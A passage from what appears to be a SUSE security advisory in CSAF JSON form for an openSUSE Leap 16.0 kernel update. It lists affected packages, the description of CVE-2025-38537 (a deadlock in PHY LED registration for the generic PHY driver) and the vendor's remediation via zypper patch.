"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38535"
},
{
"cve": "CVE-2025-38537",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38537"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: phy: Don\u0027t register LEDs for genphy\n\nIf a PHY has no driver, the genphy driver is probed/removed directly in\nphy_attach/detach. If the PHY\u0027s ofnode has an \"leds\" subnode, then the\nLEDs will be (un)registered when probing/removing the genphy driver.\nThis could occur if the leds are for a non-generic driver that isn\u0027t\nloaded for whatever reason. Synchronously removing the PHY device in\nphy_detach leads to the following deadlock:\n\nrtnl_lock()\nndo_close()\n ...\n phy_detach()\n phy_remove()\n phy_leds_unregister()\n led_classdev_unregister()\n led_trigger_set()\n netdev_trigger_deactivate()\n unregister_netdevice_notifier()\n rtnl_lock()\n\nThere is a corresponding deadlock on the open/register side of things\n(and that one is reported by lockdep), but it requires a race while this\none is deterministic.\n\nGeneric PHYs do not support LEDs anyway, so don\u0027t bother registering\nthem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38537",
"url": "https://www.suse.com/security/cve/CVE-2025-38537"
},
{
"category": "external",
"summary": "SUSE Bug 1248229 for CVE-2025-38537",
"url": "https://bugzilla.suse.com/1248229"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
